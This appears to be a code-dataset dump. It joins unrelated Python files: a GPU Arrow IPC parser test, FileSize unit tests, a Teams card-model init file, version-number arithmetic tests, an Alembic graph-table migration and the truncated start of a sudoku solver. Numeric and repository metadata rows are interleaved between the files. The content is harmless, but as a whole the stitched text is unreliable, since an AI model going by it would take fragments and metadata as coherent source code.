\x00\x94\xff\xff\xff\x01\x00\x02\x00\x04\x00\x00\x00name\x00\x00\x00\x00\x14\x00\x18\x00\x08\x00\x06\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x14\x00\x00\x00\x14\x00\x00\x00\x00\x00\x01\x02L\x00\x00\x00$\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x000\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01 \x00\x00\x00\xf8\xff\xff\xff \x00\x01\x00\x08\x00\x08\x00\x04\x00\x06\x00\x08\x00\x00\x00\x01\x00\x02\x00\x03\x00\x00\x00idx\x00\xc8\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x02\x02\x00\x14\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x08\x00\x12\x00\x08\x00\x04\x00\x08\x00\x00\x00\x18\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x18\x00\x0c\x00\x04\x00\x08\x00\n\x00\x00\x00d\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x0b\x00\x00\x00\x0f\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00orangeapplepeargrape\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
cpu_data = np.ndarray(shape=len(schema_bytes), dtype=np.byte,
buffer=bytearray(schema_bytes))
# Use GDF IPC parser
schema_ptr = ffi.cast("void*", cpu_data.ctypes.data)
ipch = libgdf.gdf_ipc_parser_open(schema_ptr, cpu_data.size)
if libgdf.gdf_ipc_parser_failed(ipch):
print(libgdf.gdf_ipc_parser_get_error(ipch))
jsonraw = libgdf.gdf_ipc_parser_get_schema_json(ipch)
jsontext = ffi.string(jsonraw).decode()
json_schema = json.loads(jsontext)
pprint(json_schema)
recordbatches_bytes = b'\x1c\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x02\x00\x18\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x18\x00\x0c\x00\x04\x00\x08\x00\n\x00\x00\x00\xac\x00\x00\x00\x10\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x10\x00\x00\x00\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x14\x00\x00\x00\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x08\x00\x00\x00\t\x00\x00\x00\n\x00\x00\x00\x0b\x00\x00\x00\x18\x00\x00\x00\x19\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00\x0c\x00\x00\x00\r\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00\x1c\x00\x00\x00\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x16\x93\xb7<\xac*\xde?\x00Y\x94@"\x0eo?\xf8+\xee\xac\xf2#\xdc?\xa4\xcauw68\xe2?\xf8\xaa\xc9\x9f*\x9f\xda?\xe0\x1e\x1b-\x8b\xa4\xd7?\xe6y\x8a\x9b\xe4<\xef?\x08\x89\xc4.0W\xc5?h\xa5\x0f\x14\xa2\xe3\xbb?\xc0\xa9/\x8f\xeap\xb8?\x0c7\xed\x99fc\xda?:\tA.\xc6g\xda?\x1c\x1f)\xfd\x03\n\xc1?\xfe\x1e\xf9(/\xf0\xe3?\x08h\x99\x05\x81m\xe7?\xa0\xa8=\xfc\x96\x93\xcd?x\x8b\xf8v\xbe_\xc8?\xa2\xd9Zg\xd9\xb9\xed?;\xdb\xa6\xfas\xdb\xed?\xd8\xc9\xfcA-\xcd\xdd?@\xe27`\x0cQ\x94?d\x11:-\x8e\xcf\xd9?\xc9S\xde\xff\xbbN\xe5?\xe0o(\xf4s?\xba?\x0bq\xb9j%o\xeb?\x10\xe8\xa1t\t\x9b\xcb?\xa5\xf0\x15\t\x1ep\xed?\xc7\xb2~\x02\x82l\xef?0\xe6\xa8g\xec\x82\xc3?\xe0\xc6\xe8\xb1\xc2~\xd6?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
rb_cpu_data = np.ndarray(shape=len(recordbatches_bytes), dtype=np.byte,
buffer=bytearray(recordbatches_bytes))
rb_gpu_data = cuda.to_device(rb_cpu_data)
del cpu_data
devptr = ffi.cast("void*", rb_gpu_data.device_ctypes_pointer.value)
libgdf.gdf_ipc_parser_open_recordbatches(ipch, devptr, rb_gpu_data.size)
if libgdf.gdf_ipc_parser_failed(ipch):
print(libgdf.gdf_ipc_parser_get_error(ipch))
jsonraw = libgdf.gdf_ipc_parser_get_layout_json(ipch)
jsontext = ffi.string(jsonraw).decode()
json_rb = json.loads(jsontext)
pprint(json_rb)
offset = libgdf.gdf_ipc_parser_get_data_offset(ipch)
libgdf.gdf_ipc_parser_close(ipch)
# Check
dicts = json_schema['dictionaries']
assert len(dicts) == 1
dictdata = dicts[0]['data']['columns'][0]['DATA']
assert set(dictdata) == {'orange', 'apple', 'pear', 'grape'}
gpu_data = rb_gpu_data[offset:]
schema_fields = json_schema['schema']['fields']
assert len(schema_fields) == 3
field_names = [f['name'] for f in schema_fields]
assert field_names == ['idx', 'name', 'weight']
# check the dictionary id in schema
assert schema_fields[1]['dictionary']['id'] == dicts[0]['id']
# Get "idx" column
idx_buf_off = json_rb[0]['data_buffer']['offset']
idx_buf_len = json_rb[0]['data_buffer']['length']
idx_buf = gpu_data[idx_buf_off:][:idx_buf_len]
assert json_rb[0]['dtype']['name'] == 'INT32'
idx_size = json_rb[0]['length']
assert idx_size == 30
idx_data = np.ndarray(shape=idx_size, dtype=np.int32,
buffer=idx_buf.copy_to_host())
print(idx_data)
# Get "name" column
name_buf_off = json_rb[1]['data_buffer']['offset']
name_buf_len = json_rb[1]['data_buffer']['length']
name_buf = gpu_data[name_buf_off:][:name_buf_len]
assert json_rb[1]['dtype']['name'] == 'DICTIONARY'
name_size = json_rb[1]['length']
name_data = np.ndarray(shape=name_size, dtype=np.int32,
buffer=name_buf.copy_to_host())
print(name_data)
# Get "name" column
weight_buf_off = json_rb[2]['data_buffer']['offset']
weight_buf_len = json_rb[2]['data_buffer']['length']
weight_buf = gpu_data[weight_buf_off:][:weight_buf_len]
assert json_rb[2]['dtype']['name'] == 'DOUBLE'
weight_size = json_rb[2]['length']
weight_data = np.ndarray(shape=weight_size, dtype=np.float64,
buffer=weight_buf.copy_to_host())
print(weight_data)
# verify data
sortedidx = np.argsort(idx_data)
idx_data = idx_data[sortedidx]
name_data = name_data[sortedidx]
weight_data = weight_data[sortedidx]
got_iter = zip(idx_data, name_data, weight_data)
for expected, got in zip(get_expected_values(), got_iter):
assert expected[0] == got[0]
assert expected[1] == dictdata[got[1]]
assert expected[2] == got[2]
| 71.162162
| 2,917
| 0.722845
| 2,097
| 10,532
| 3.549356
| 0.151168
| 0.59734
| 0.711004
| 0.722289
| 0.577455
| 0.49738
| 0.465135
| 0.400645
| 0.379417
| 0.36101
| 0
| 0.318912
| 0.078238
| 10,532
| 147
| 2,918
| 71.646259
| 0.447775
| 0.011679
| 0
| 0.053097
| 0
| 0.017699
| 0.661058
| 0.631827
| 0
| 1
| 0
| 0
| 0.106195
| 1
| 0.017699
| false
| 0
| 0.044248
| 0
| 0.070796
| 0.070796
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
673354e3055a7b1d71b08746c1c94df14e4db352
| 4,429
|
py
|
Python
|
TestFileSize1000_3.py
|
ytyaru/Python.FileSize.201702071138
|
569c45d5e9b91befbaece50520eb69955e148c65
|
[
"CC0-1.0"
] | null | null | null |
TestFileSize1000_3.py
|
ytyaru/Python.FileSize.201702071138
|
569c45d5e9b91befbaece50520eb69955e148c65
|
[
"CC0-1.0"
] | 6
|
2017-02-09T00:54:50.000Z
|
2017-02-09T10:56:13.000Z
|
TestFileSize1000_3.py
|
ytyaru/Python.FileSize.201702071138
|
569c45d5e9b91befbaece50520eb69955e148c65
|
[
"CC0-1.0"
] | null | null | null |
import unittest
import FileSize
from decimal import Decimal
class TestFileSize1000_3(unittest.TestCase):
def test_999(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 999
self.assertEqual(self.__target.Get(actual), "999 B")
def test_1000(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1000
self.assertEqual(self.__target.Get(actual), "1 KB")
def test_1023(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1023
self.assertEqual(self.__target.Get(actual), "1.02 KB")
def test_1024(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1024
self.assertEqual(self.__target.Get(actual), "1.02 KB")
def test_1000KB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1000 * 1000 - 1
self.assertEqual(self.__target.Get(actual), "999.99 KB")
def test_1MB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1000 * 1000
self.assertEqual(self.__target.Get(actual), "1 MB")
def test_1000MB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 2) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 MB")
def test_1GB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 2) * 1000)
self.assertEqual(self.__target.Get(actual), "1 GB")
def test_1000GB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 3) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 GB")
def test_1TB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 3) * 1000)
self.assertEqual(self.__target.Get(actual), "1 TB")
def test_1000TB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 4) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 TB")
def test_1PB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 4) * 1000)
self.assertEqual(self.__target.Get(actual), "1 PB")
def test_1000PB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 5) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 PB")
def test_1EB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 5) * 1000)
self.assertEqual(self.__target.Get(actual), "1 EB")
def test_1000EB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 6) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 EB")
def test_1ZB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 6) * 1000)
self.assertEqual(self.__target.Get(actual), "1 ZB")
def test_1000ZB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 7) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 ZB")
def test_1YB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 7) * 1000)
self.assertEqual(self.__target.Get(actual), "1 YB")
def test_1000YB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 8) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 YB")
def test_1YB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 7) * 1000)
self.assertEqual(self.__target.Get(actual), "1 YB")
| 47.117021
| 88
| 0.671032
| 617
| 4,429
| 4.47812
| 0.097245
| 0.14477
| 0.101339
| 0.159247
| 0.882012
| 0.882012
| 0.882012
| 0.868621
| 0.779949
| 0.779949
| 0
| 0.11064
| 0.202077
| 4,429
| 93
| 89
| 47.623656
| 0.671194
| 0
| 0
| 0.333333
| 0
| 0
| 0.028681
| 0
| 0
| 0
| 0
| 0
| 0.238095
| 1
| 0.238095
| false
| 0
| 0.035714
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
673e386142a796b3285cf69ff042edd4f8d665b3
| 130
|
py
|
Python
|
src/teams/models/__init__.py
|
ighanim/aws-cost-anomaly-alerts
|
ad6d601c7dbdfbdf22f174ea16e76c7ef268edda
|
[
"MIT"
] | null | null | null |
src/teams/models/__init__.py
|
ighanim/aws-cost-anomaly-alerts
|
ad6d601c7dbdfbdf22f174ea16e76c7ef268edda
|
[
"MIT"
] | null | null | null |
src/teams/models/__init__.py
|
ighanim/aws-cost-anomaly-alerts
|
ad6d601c7dbdfbdf22f174ea16e76c7ef268edda
|
[
"MIT"
] | null | null | null |
from .adaptive_card_elements import factSet
from .adaptive_card_elements import fact
from .adaptive_card_elements import textBlock
| 43.333333
| 45
| 0.892308
| 18
| 130
| 6.111111
| 0.444444
| 0.327273
| 0.436364
| 0.654545
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084615
| 130
| 3
| 45
| 43.333333
| 0.92437
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
67953587e7978cd283fb91f0db8d14881eee4c33
| 2,474
|
py
|
Python
|
tests/test_math.py
|
CPSuperstore/PyVersionNumber
|
eef7dc45469603c0875c8359c562a72f48fe761c
|
[
"MIT"
] | null | null | null |
tests/test_math.py
|
CPSuperstore/PyVersionNumber
|
eef7dc45469603c0875c8359c562a72f48fe761c
|
[
"MIT"
] | null | null | null |
tests/test_math.py
|
CPSuperstore/PyVersionNumber
|
eef7dc45469603c0875c8359c562a72f48fe761c
|
[
"MIT"
] | null | null | null |
import unittest
import sys
sys.path.append('..')
from PyVersionNumber import VersionNumber
class TestCaseMath(unittest.TestCase):
def test_addition(self):
self.assertEqual(VersionNumber(1, 2, 3) + VersionNumber(3, 2, 1), VersionNumber(4, 4, 4))
self.assertEqual(VersionNumber(1, 2, 3) + VersionNumber(1, 2, 3), VersionNumber(2, 4, 6))
self.assertEqual(VersionNumber(1, 1, 1) + VersionNumber(2, 2, 2), VersionNumber(3, 3, 3))
def test_subtraction(self):
self.assertEqual(VersionNumber(1, 2, 3) - VersionNumber(3, 2, 1), VersionNumber(-2, 0, 2))
self.assertEqual(VersionNumber(1, 2, 3) - VersionNumber(1, 2, 3), VersionNumber(0, 0, 0))
self.assertEqual(VersionNumber(1, 1, 1) - VersionNumber(2, 2, 2), VersionNumber(-1, -1, -1))
def test_multiplication(self):
self.assertEqual(VersionNumber(1, 2, 3) * VersionNumber(3, 2, 1), VersionNumber(3, 4, 3))
self.assertEqual(VersionNumber(1, 2, 3) * VersionNumber(1, 2, 3), VersionNumber(1, 4, 9))
self.assertEqual(VersionNumber(1, 1, 1) * VersionNumber(2, 2, 2), VersionNumber(2, 2, 2))
def test_division(self):
self.assertEqual(VersionNumber(1, 2, 3) / VersionNumber(3, 2, 1), VersionNumber(0, 1, 3))
self.assertEqual(VersionNumber(1, 2, 3) / VersionNumber(1, 2, 3), VersionNumber(1, 1, 1))
self.assertEqual(VersionNumber(1, 1, 1) / VersionNumber(2, 2, 2), VersionNumber(0, 0, 0))
def test_floor_division(self):
self.assertEqual(VersionNumber(1, 2, 3) // VersionNumber(3, 2, 1), VersionNumber(0, 1, 3))
self.assertEqual(VersionNumber(1, 2, 3) // VersionNumber(1, 2, 3), VersionNumber(1, 1, 1))
self.assertEqual(VersionNumber(1, 1, 1) // VersionNumber(2, 2, 2), VersionNumber(0, 0, 0))
def test_exponent(self):
self.assertEqual(VersionNumber(1, 2, 3) ** VersionNumber(3, 2, 1), VersionNumber(1, 4, 3))
self.assertEqual(VersionNumber(1, 2, 3) ** VersionNumber(1, 2, 3), VersionNumber(1, 4, 27))
self.assertEqual(VersionNumber(1, 1, 1) ** VersionNumber(2, 2, 2), VersionNumber(1, 1, 1))
def test_modulus(self):
self.assertEqual(VersionNumber(1, 2, 3) % VersionNumber(3, 2, 1), VersionNumber(1, 0, 0))
self.assertEqual(VersionNumber(1, 2, 3) % VersionNumber(1, 2, 3), VersionNumber(0, 0, 0))
self.assertEqual(VersionNumber(1, 1, 1) % VersionNumber(2, 2, 2), VersionNumber(1, 1, 1))
if __name__ == '__main__':
unittest.main()
| 52.638298
| 100
| 0.652789
| 343
| 2,474
| 4.661808
| 0.09621
| 0.323952
| 0.36773
| 0.380863
| 0.861163
| 0.861163
| 0.859912
| 0.859912
| 0.859912
| 0.859912
| 0
| 0.09392
| 0.182296
| 2,474
| 46
| 101
| 53.782609
| 0.69649
| 0
| 0
| 0
| 0
| 0
| 0.004042
| 0
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0.2
| false
| 0
| 0.085714
| 0
| 0.314286
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
67c42738b5c6c07406322f85ebd4a8e80e63155a
| 3,278
|
py
|
Python
|
timesketch/migrations/versions/654121a84a33_.py
|
wajihyassine/timesketch
|
b099d1afb33d0b9f906a0ad407979c8f22a54476
|
[
"Apache-2.0"
] | 1,810
|
2015-01-03T22:34:45.000Z
|
2022-03-30T10:23:18.000Z
|
timesketch/migrations/versions/654121a84a33_.py
|
wajihyassine/timesketch
|
b099d1afb33d0b9f906a0ad407979c8f22a54476
|
[
"Apache-2.0"
] | 1,291
|
2015-01-08T00:00:12.000Z
|
2022-03-29T03:26:58.000Z
|
timesketch/migrations/versions/654121a84a33_.py
|
wajihyassine/timesketch
|
b099d1afb33d0b9f906a0ad407979c8f22a54476
|
[
"Apache-2.0"
] | 519
|
2015-01-20T09:26:06.000Z
|
2022-03-29T11:02:10.000Z
|
"""Add Graph and GraphCache models
Revision ID: 654121a84a33
Revises: fc7bc5c66c63
Create Date: 2020-11-16 21:02:36.249989
"""
# revision identifiers, used by Alembic.
revision = '654121a84a33'
down_revision = 'fc7bc5c66c63'
from alembic import op
import sqlalchemy as sa
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('graph',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('sketch_id', sa.Integer(), nullable=True),
sa.Column('name', sa.UnicodeText(), nullable=True),
sa.Column('description', sa.UnicodeText(), nullable=True),
sa.Column('graph_config', sa.UnicodeText(), nullable=True),
sa.Column('graph_elements', sa.UnicodeText(), nullable=True),
sa.Column('graph_thumbnail', sa.UnicodeText(), nullable=True),
sa.Column('num_nodes', sa.Integer(), nullable=True),
sa.Column('num_edges', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['sketch_id'], ['sketch.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('graphcache',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('sketch_id', sa.Integer(), nullable=True),
sa.Column('graph_plugin', sa.UnicodeText(), nullable=True),
sa.Column('graph_config', sa.UnicodeText(), nullable=True),
sa.Column('graph_elements', sa.UnicodeText(), nullable=True),
sa.Column('num_nodes', sa.Integer(), nullable=True),
sa.Column('num_edges', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['sketch_id'], ['sketch.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('graph_comment',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('comment', sa.UnicodeText(), nullable=True),
sa.Column('parent_id', sa.Integer(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['parent_id'], ['graph.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('graph_label',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('label', sa.Unicode(length=255), nullable=True),
sa.Column('parent_id', sa.Integer(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['parent_id'], ['graph.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('graph_label')
op.drop_table('graph_comment')
op.drop_table('graphcache')
op.drop_table('graph')
# ### end Alembic commands ###
| 40.469136
| 66
| 0.669311
| 409
| 3,278
| 5.254279
| 0.171149
| 0.122848
| 0.188925
| 0.232666
| 0.791531
| 0.789204
| 0.767799
| 0.765472
| 0.703583
| 0.703583
| 0
| 0.019497
| 0.139414
| 3,278
| 80
| 67
| 40.975
| 0.74229
| 0.095485
| 0
| 0.612903
| 0
| 0
| 0.173839
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032258
| false
| 0
| 0.032258
| 0
| 0.064516
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
67c9030818c75de83803b6eecb210c3c660e11e2
| 15,725
|
py
|
Python
|
sudoku.py
|
NavSanya/ML-Sudoku-Analysis
|
51c22a444e518e367840415fcad52a3e12f4d13a
|
[
"MIT"
] | 3
|
2021-04-21T03:54:51.000Z
|
2021-11-03T04:19:33.000Z
|
sudoku.py
|
NavSanya/ML-Sudoku-Analysis
|
51c22a444e518e367840415fcad52a3e12f4d13a
|
[
"MIT"
] | null | null | null |
sudoku.py
|
NavSanya/ML-Sudoku-Analysis
|
51c22a444e518e367840415fcad52a3e12f4d13a
|
[
"MIT"
] | 2
|
2021-04-15T03:29:42.000Z
|
2022-02-10T01:12:54.000Z
|
#CSCI 191T Biology inspired ML
#Project 1
#Sudoku solver
import numpy as np
sudoku1 = [ [0,0,0,4,0,0,2,0,0],
[7,0,8,5,2,6,0,9,0],
[5,0,0,0,1,0,0,0,0],
[2,3,5,0,0,0,0,0,1],
[0,0,6,0,7,0,4,0,0],
[4,0,0,0,0,0,6,3,9],
[0,0,0,0,3,0,0,0,7],
[0,6,0,1,5,2,9,0,4],
[0,0,4,0,0,8,0,0,0]]
sudoku2 = [ [0,0,0,0,1,2,8,4,5],
[0,1,0,7,0,0,0,3,0],
[0,8,0,6,0,9,0,0,0],
[2,0,0,0,0,7,4,0,0],
[0,0,5,0,0,0,9,0,0],
[0,0,8,9,0,0,0,0,2],
[0,0,0,1,0,3,0,9,0],
[0,3,0,0,0,4,0,8,0],
[1,5,9,2,6,0,0,0,0]]
sudoku3 = [ [9,8,7,0,0,0,3,0,0],
[1,6,0,0,8,0,0,9,0],
[0,0,0,0,0,4,1,0,6],
[0,2,0,0,0,6,0,0,8],
[0,0,0,5,0,7,0,0,0],
[3,0,0,9,0,0,0,6,0],
[2,0,8,4,0,0,0,0,0],
[0,7,0,0,1,0,0,5,9],
[0,0,5,0,0,0,8,2,3]]
sudoku4 = [ [0,1,6,0,0,0,0,3,0],
[8,0,0,9,0,0,2,0,6],
[0,0,0,0,0,0,0,5,8],
[0,7,2,4,0,6,0,0,0],
[0,6,9,0,7,0,4,2,0],
[0,0,0,3,0,5,9,6,0],
[1,3,0,0,0,0,0,0,0],
[6,0,4,0,0,1,0,0,5],
[0,2,0,0,0,0,8,1,0]]
sudoku5 = [ [0,3,0,6,0,5,0,8,0],
[7,0,0,3,0,0,0,0,0],
[0,0,0,9,7,0,5,4,0],
[0,6,7,0,0,0,3,0,8],
[0,2,0,0,0,0,0,6,0],
[4,0,9,0,0,0,7,5,0],
[0,9,5,0,3,4,0,0,0],
[0,0,0,0,0,7,0,0,2],
[0,7,0,1,0,6,0,9,0]]
sudoku6 = [ [1,0,0,5,0,6,0,9,0],
[0,3,0,0,8,0,4,0,0],
[6,0,0,0,7,0,1,0,2],
[0,0,0,0,0,7,0,2,4],
[7,0,0,0,9,0,0,0,8],
[9,2,0,6,0,0,0,0,0],
[3,0,2,0,5,0,0,0,6],
[0,0,1,0,6,0,0,5,0],
[0,9,0,8,0,1,0,0,7]]
sudoku7 = [ [0,0,0,0,0,5,1,7,0],
